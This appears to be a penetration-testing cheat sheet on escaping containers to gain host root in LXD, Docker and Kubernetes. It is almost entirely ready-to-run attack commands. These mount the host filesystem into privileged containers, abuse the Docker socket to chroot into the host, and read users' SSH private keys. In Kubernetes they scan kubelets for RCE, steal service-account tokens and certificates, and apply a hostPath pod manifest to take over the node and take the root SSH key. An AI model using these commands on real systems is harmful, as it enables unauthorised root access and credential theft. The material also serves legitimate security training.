Skip to main content

Containers

LXD Privilege Escalation

LXD (Linux Daemon) provides system containers that share the host kernel. If a user is in the lxd group, they can escalate privileges by mounting the host filesystem inside a container.

id  

# Import an existing container image  
lxc image import ubuntu-image.tar.xz --alias privesc  

# Initialize a privileged container and mount the host filesystem  
lxc init privesc privesc-container -c security.privileged=true  
lxc config device add privesc-container host-root disk source=/ path=/mnt/root recursive=true  

# Start the container and get root access to the host
lxc start privesc-container  
lxc exec privesc-container /bin/bash ## Summon 'bash' shell and go to '/mnt/root'

Docker Privilege Escalation

Docker is a popular containerization tool that allows applications to run in isolated environments. However, misconfigurations in Docker can lead to privilege escalation, allowing an attacker to escape the container and gain root access to the host machine.

groups
grep 'docker' /etc/group

# List running containers
docker ps -a
docker images

# Look for Mounted Volumes
docker inspect <container_id> | grep Mounts
df -h
ls /mnt

# Check for access to the Docker socket
## If we have permission we can create container with elevated privileges
ls -l /var/run/docker.sock

# Identify Writable Docker Config Files
find /etc/docker -type f -writable
docker run --rm -v /:/mnt ubuntu chroot /mnt sh

# If we have write access to /var/run/docker.sock, we can create a privileged container.
docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt sh

# Running a Privileged Container
docker run --rm -it --privileged ubuntu bash

# If a user’s home directory is shared, we can extract SSH keys.
cd /hostsystem/home/<user>/.ssh
cat id_rsa

# If a user is in the Docker group, they can start a root container.
docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh

Kubernetes Privilege Escalation

Kubernetes (K8s) is a container orchestration platform used for managing containerized applications. Understanding its components (Control Plane, Worker Nodes) and security measures (RBAC, API server) is critical for penetration testing.

curl https://<K8s_API_SERVER>:6443 -k

# Get the list of all running pods on the cluster.
curl https://<K8s_API_SERVER>:10250/pods -k | jq .

# List pods with Kubeletctl, useful for direct interaction with containers.
kubeletctl -i --server <K8s_API_SERVER> pods

# Check if pods are vulnerable to Remote Code Execution (RCE).
kubeletctl -i --server <K8s_API_SERVER> scan rce

# Extract the Kubernetes service account token for authentication.
kubeletctl -i --server <K8s_API_SERVER> exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p <POD_NAME> -c <CONTAINER_NAME> | tee -a k8.token

# Extract the Kubernetes certificate for secure API server communication.
kubeletctl --server <K8s_API_SERVER> exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt" -p <POD_NAME> -c <CONTAINER_NAME> | tee -a ca.crt

# Check permissions granted to the service account using the extracted token.
kubectl --token=<TOKEN> --certificate-authority=ca.crt --server=https://<K8s_API_SERVER>:6443 auth can-i --list

# "escalate-access.yaml":
```yaml
apiVersion: v1
kind: Pod
metadata:
  name: escalate-access
  namespace: default
spec:
  containers:
  - name: escalate-container
    image: nginx:1.15.3
    volumeMounts:
    - mountPath: /host-root
      name: mount-root-volume
  volumes:
  - name: mount-root-volume
    hostPath:
       path: /
  automountServiceAccountToken: true
  hostNetwork: true
```

# Apply the YAML to create a pod that mounts the host’s root filesystem.
kubectl --token=<TOKEN> --certificate-authority=ca.crt --server=https://<K8s_API_SERVER>:6443 apply -f escalate-access.yaml

# Extract root SSH private key for further access.
kubeletctl --server <K8s_API_SERVER> exec "cat /host-root/root/.ssh/id_rsa" -p escalate-access -c escalate-container